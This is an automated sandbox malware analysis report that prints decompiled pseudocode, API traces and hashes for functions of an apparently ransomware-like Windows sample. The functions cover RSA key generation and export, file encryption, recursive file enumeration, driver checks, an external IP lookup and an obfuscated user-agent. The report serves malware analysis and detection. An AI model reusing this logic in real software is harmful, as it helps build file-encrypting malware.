encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FBC6530(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xfbd2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0FBC34F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xfbd2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0fbc653b
0x0fbc6541
0x0fbc6548
0x0fbc655a
0x0fbc655e
0x0fbc6566
0x0fbc659e
0x0fbc659e
0x0fbc65c1
0x0fbc65c3
0x0fbc65cc
0x0fbc65da
0x0fbc65e0
0x0fbc65e6
0x0fbc65f4
0x0fbc6602
0x0fbc6608
0x0fbc6611
0x0fbc6618
0x0fbc661d
0x0fbc661d
0x0fbc6618
0x0fbc6628
0x0fbc6633
0x00000000
0x0fbc6639
0x0fbc6568
0x0fbc6573
0x00000000
0x0fbc6597
0x0fbc6584
0x0fbc658c
0x00000000
0x0fbc6595
0x00000000

APIs

EnterCriticalSection.KERNEL32(0FBD2A48,?,0FBC3724,00000000,00000000,00000000,?,00000800), ref: 0FBC653B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0FBC3724,00000000,00000000,00000000), ref: 0FBC655E
GetLastError.KERNEL32(?,0FBC3724,00000000,00000000,00000000), ref: 0FBC6568
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBC3724,00000000,00000000,00000000), ref: 0FBC6584
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0FBC3724,00000000,00000000), ref: 0FBC65B9
CryptGetKeyParam.ADVAPI32(00000000,00000008,0FBC3724,0000000A,00000000,?,0FBC3724,00000000), ref: 0FBC65DA
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0FBC3724,?,0FBC3724,00000000), ref: 0FBC6602
GetLastError.KERNEL32(?,0FBC3724,00000000), ref: 0FBC660B
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0FBC3724,00000000,00000000), ref: 0FBC6628
LeaveCriticalSection.KERNEL32(0FBD2A48,?,0FBC3724,00000000,00000000), ref: 0FBC6633

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FBC6553, 0FBC6579

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 602ec0748875f617b87ecc7c56b7c99716ab98dfa3cfc379b4b928e4066827d3
Instruction ID: 2aafeb1e6ce8fb784089d7ed513d123bba60de3bb34933a3ed54b84700e16ced
Opcode Fuzzy Hash: 602ec0748875f617b87ecc7c56b7c99716ab98dfa3cfc379b4b928e4066827d3
Instruction Fuzzy Hash: 6E313C75A40309BBDB10CFA1ED55FEF7BB9EB48702F104198F605AB180DB79A6118FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC62B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0FBC62B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x0fbc62c1
0x0fbc62c5
0x0fbc62cd
0x0fbc6305
0x0fbc6313
0x0fbc6317
0x0fbc631f
0x0fbc631f
0x0fbc6322
0x0fbc633b
0x0fbc6353
0x0fbc635d
0x0fbc6369
0x0fbc637e
0x00000000
0x0fbc6384
0x0fbc62cf
0x0fbc62da
0x00000000
0x0fbc62fe
0x0fbc62eb
0x0fbc62f3
0x00000000
0x0fbc62fc
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0FBC49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0FBC49C6,?,0FBC49CE), ref: 0FBC62C5
GetLastError.KERNEL32(?,0FBC49CE), ref: 0FBC62CF
CryptAcquireContextW.ADVAPI32(0FBC49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBC49CE), ref: 0FBC62EB
CryptGenKey.ADVAPI32(0FBC49CE,0000A400,08000001,?,?,0FBC49CE), ref: 0FBC6317
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0FBC633B
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0FBC6353
CryptDestroyKey.ADVAPI32(?), ref: 0FBC635D
CryptReleaseContext.ADVAPI32(0FBC49CE,00000000), ref: 0FBC6369
CryptAcquireContextW.ADVAPI32(0FBC49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0FBC637E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FBC62BA, 0FBC62E0, 0FBC6373

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: b5660e1199245f188857ee096c667a082e559eeb5a5fe8b046e96ae67be1a1ec
Instruction ID: a4a69ffa538a4a8b3d3a1e9b94985caec232893f851c77ba9451931d1ce687c4
Opcode Fuzzy Hash: b5660e1199245f188857ee096c667a082e559eeb5a5fe8b046e96ae67be1a1ec
Instruction Fuzzy Hash: ED216275780309BBDB20CAA4ED59FDB376DAB4CB52F004588F705EB1C0C6B595119FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0FBC2F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				WCHAR* _t23;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8);
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
					_t35 = _t18;
					if(_t35 != 0) {
						_push( &_v12);
						_push(_v8);
						_push(_t35);
						if( *_t39() == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000);
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 <= 0) {
								goto L10;
							} else {
								while(1) {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
										break;
									}
									_t40 = _t40 + 1;
									if(_t40 < _t31) {
										continue;
									} else {
										goto L10;
									}
									goto L12;
								}
								VirtualFree(_t35, 0, 0x8000);
								return 1;
							}
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x0fbc2f5a
0x0fbc2f69
0x0fbc2f6d
0x0fbc2f74
0x0fbc2f76
0x0fbc2f7b
0x0fbc2f8d
0x0fbc2f93
0x0fbc2f97
0x0fbc2fa3
0x0fbc2fa4
0x0fbc2fa7
0x0fbc2fac
0x0fbc2ff2
0x0fbc2ffa
0x0fbc3008
0x0fbc2fae
0x0fbc2fb1
0x0fbc2fb3
0x0fbc2fb8
0x00000000
0x0fbc2fc0
0x0fbc2fc0
0x0fbc2fc5
0x0fbc2fcf
0x0fbc2fd7
0x00000000
0x00000000
0x0fbc2fed
0x0fbc2ff0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbc2ff0
0x0fbc3011
0x0fbc3022
0x0fbc3022
0x0fbc2fb8
0x0fbc2f99
0x0fbc2f9e
0x0fbc2f9e
0x0fbc2f81
0x0fbc2f81
0x0fbc2f81
0x00000000

APIs

EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0FBC2F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FBC2F8D

Strings

i)w, xrefs: 0FBC2FE3

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: i)w
API String ID: 4140748134-1280834553
Opcode ID: e0da9b153bde738fdf98963860af8f9bdea6655225e9dcc292d758d570307bbe
Instruction ID: fc511c342491ae8507da5eb3c24faf7987263ceb2d5de6f78a8aac082dc504b5
Opcode Fuzzy Hash: e0da9b153bde738fdf98963860af8f9bdea6655225e9dcc292d758d570307bbe
Instruction Fuzzy Hash: F9219B3260011DABEB109A99AC45FEB77ACEB45711F1041E6FA04E7140D775A5169FE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0FBC7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBC7EC4
Part of subcall function 0FBC7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBC7EDD

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,772966A0,?), ref: 0FBC6EAF
lstrlenW.KERNEL32(0FBCFF0C), ref: 0FBC6EBC

Part of subcall function 0FBC7EF0: InternetCloseHandle.WININET(?), ref: 0FBC7F03
Part of subcall function 0FBC7EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FBC7F22

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0FBCFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FBC6EEB
wsprintfW.USER32 ref: 0FBC6F03
VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0FBCFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FBC6F19
InternetCloseHandle.WININET(?), ref: 0FBC6F27

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0FBC6EDC
GET, xrefs: 0FBC6EC4

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: bf35f0d85a801dc5f388a299f769713b5baa25d8452cd31ca7b0fd1e416b91d3
Instruction ID: 5b5a3f533e58bb0051f52808c7dc6a14e9b58df47b5e9d31ae28a1b034e295c7
Opcode Fuzzy Hash: bf35f0d85a801dc5f388a299f769713b5baa25d8452cd31ca7b0fd1e416b91d3
Instruction Fuzzy Hash: A801963164120877DB106A66BC4EF9B3B2EEB86F52F0000E8FA05E2081DE685516CEF5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6C90 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBC6C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0FBC6A40(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0FBC6BE0(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0FBC6950(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0FBC6C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x0fbc6c9c
0x0fbc6c9f
0x0fbc6ca1
0x0fbc6ca8
0x0fbc6dd6
0x0fbc6dd6
0x0fbc6ddc
0x0fbc6cbd
0x0fbc6cbd
0x0fbc6cd5
0x0fbc6cd8
0x0fbc6cdb
0x0fbc6ce5
0x0fbc6ceb
0x0fbc6ced
0x0fbc6cf0
0x0fbc6cf6
0x0fbc6d04
0x0fbc6d10
0x0fbc6d1c
0x0fbc6d22
0x0fbc6d24
0x0fbc6d36
0x0fbc6d3c
0x0fbc6d3e
0x0fbc6d48
0x0fbc6d4a
0x0fbc6d51
0x0fbc6d82
0x0fbc6d85
0x0fbc6d8a
0x0fbc6d8d
0x0fbc6d8f
0x0fbc6d92
0x0fbc6d95
0x0fbc6d97
0x0fbc6da0
0x0fbc6da0
0x0fbc6da3
0x0fbc6da3
0x0fbc6d99
0x0fbc6d9c
0x0fbc6d9e
0x00000000
0x00000000
0x0fbc6d9e
0x0fbc6d97
0x0fbc6d53
0x0fbc6d67
0x0fbc6d6c
0x0fbc6d6c
0x0fbc6dae
0x0fbc6dae
0x0fbc6db0
0x0fbc6db0
0x0fbc6d3e
0x0fbc6dbd
0x0fbc6dc3
0x0fbc6dc3
0x0fbc6dce
0x00000000
0x0fbc6cf8
0x0fbc6d03
0x0fbc6d03
0x0fbc6cf6

APIs

Part of subcall function 0FBC6640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6653
Part of subcall function 0FBC6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC66F2
Part of subcall function 0FBC6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC670C
Part of subcall function 0FBC6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6726
Part of subcall function 0FBC6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6740
Part of subcall function 0FBC6640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6760

Part of subcall function 0FBC6A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6A52
Part of subcall function 0FBC6A40: lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6A64
Part of subcall function 0FBC6A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6A72
Part of subcall function 0FBC6A40: lstrcmpW.KERNEL32(?,0FBCFEC8,?,?), ref: 0FBC6A9C
Part of subcall function 0FBC6A40: lstrcmpW.KERNEL32(?,0FBCFECC,?,?), ref: 0FBC6AB2
Part of subcall function 0FBC6A40: lstrcatW.KERNEL32(00000000,?), ref: 0FBC6AC4
Part of subcall function 0FBC6A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0FBC6ACB
Part of subcall function 0FBC6A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FBC6AFA
Part of subcall function 0FBC6A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FBC6B11
Part of subcall function 0FBC6A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FBC6B1C
Part of subcall function 0FBC6A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FBC6B3A
Part of subcall function 0FBC6A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FBC6B4F

Part of subcall function 0FBC6BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FBC6CC2,00000000,?,?), ref: 0FBC6BF5
Part of subcall function 0FBC6BE0: wsprintfW.USER32 ref: 0FBC6C03
Part of subcall function 0FBC6BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FBC6C1F
Part of subcall function 0FBC6BE0: GetLastError.KERNEL32(?,?), ref: 0FBC6C2C
Part of subcall function 0FBC6BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBC6C78

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6CC3
lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6CDB
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6CE5
lstrcmpW.KERNEL32(?,0FBCFEC8,?,?), ref: 0FBC6D1C
lstrcmpW.KERNEL32(?,0FBCFECC,?,?), ref: 0FBC6D36
lstrcatW.KERNEL32(00000000,?), ref: 0FBC6D48
lstrcatW.KERNEL32(00000000,0FBCFEFC), ref: 0FBC6D59
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FBC6DBD
FindClose.KERNEL32(00003000,?,?), ref: 0FBC6DCE

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
String ID:
API String ID: 1112924665-0
Opcode ID: c7e00909be6b9a34ae591ee65c5ee088ff97ace0c4fe98a6df37e3b8f9749801
Instruction ID: c4dedb3cb0d3523380bca93040da68a3f436fdf22d864ca2cb763131f44bff6d
Opcode Fuzzy Hash: c7e00909be6b9a34ae591ee65c5ee088ff97ace0c4fe98a6df37e3b8f9749801
Instruction Fuzzy Hash: 5B319371A00219ABCF10AF65EC84DBF77BAEF48351B0441E9E909D7112DB35AA11DFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7CE0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC7CE0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x0fbc7cf8
0x0fbc7d04
0x0fbc7d0f
0x0fbc7d19
0x0fbc7d23
0x0fbc7d2d
0x0fbc7d37
0x0fbc7d41
0x0fbc7d4b
0x0fbc7d55
0x0fbc7d5f
0x0fbc7d69
0x0fbc7d73
0x0fbc7d7d
0x0fbc7d87
0x0fbc7d91
0x0fbc7d9b
0x0fbc7da5
0x0fbc7daf
0x0fbc7db9
0x0fbc7dc3
0x0fbc7dcd
0x0fbc7dd7
0x0fbc7de1
0x0fbc7deb
0x0fbc7df2
0x0fbc7df9
0x0fbc7e00
0x0fbc7e07
0x0fbc7e0e
0x0fbc7e15
0x0fbc7e1c
0x0fbc7e23
0x0fbc7e2a
0x0fbc7e31
0x0fbc7e38
0x0fbc7e3f
0x0fbc7e46
0x0fbc7e4d
0x0fbc7e54
0x0fbc7e5b
0x0fbc7e62
0x0fbc7e69
0x0fbc7e70
0x0fbc7e77
0x0fbc7e7e
0x0fbc7e85
0x0fbc7e8c
0x0fbc7e93
0x0fbc7e9a
0x0fbc7ea1
0x0fbc7ea8
0x0fbc7eaf
0x0fbc7eb6
0x0fbc7ebd
0x0fbc7ec4
0x0fbc7ec6
0x0fbc7ecb
0x0fbc7edd
0x0fbc7edf
0x00000000
0x0fbc7edf
0x0fbc7ee8

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBC7EC4
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBC7EDD

Strings

0, xrefs: 0FBC7D37
5, xrefs: 0FBC7DF2
M, xrefs: 0FBC7D04
5, xrefs: 0FBC7EAF
7, xrefs: 0FBC7DF9
i, xrefs: 0FBC7EA8
., xrefs: 0FBC7E70
h, xrefs: 0FBC7E54
3, xrefs: 0FBC7E85
t, xrefs: 0FBC7DEB
e, xrefs: 0FBC7E31
d, xrefs: 0FBC7D55
e, xrefs: 0FBC7E62
, xrefs: 0FBC7E23
w, xrefs: 0FBC7D5F
L, xrefs: 0FBC7E1C
, xrefs: 0FBC7E07
l, xrefs: 0FBC7D19
5, xrefs: 0FBC7E69
), xrefs: 0FBC7DAF
T, xrefs: 0FBC7D73
6, xrefs: 0FBC7D7D
K, xrefs: 0FBC7E0E
o, xrefs: 0FBC7E5B
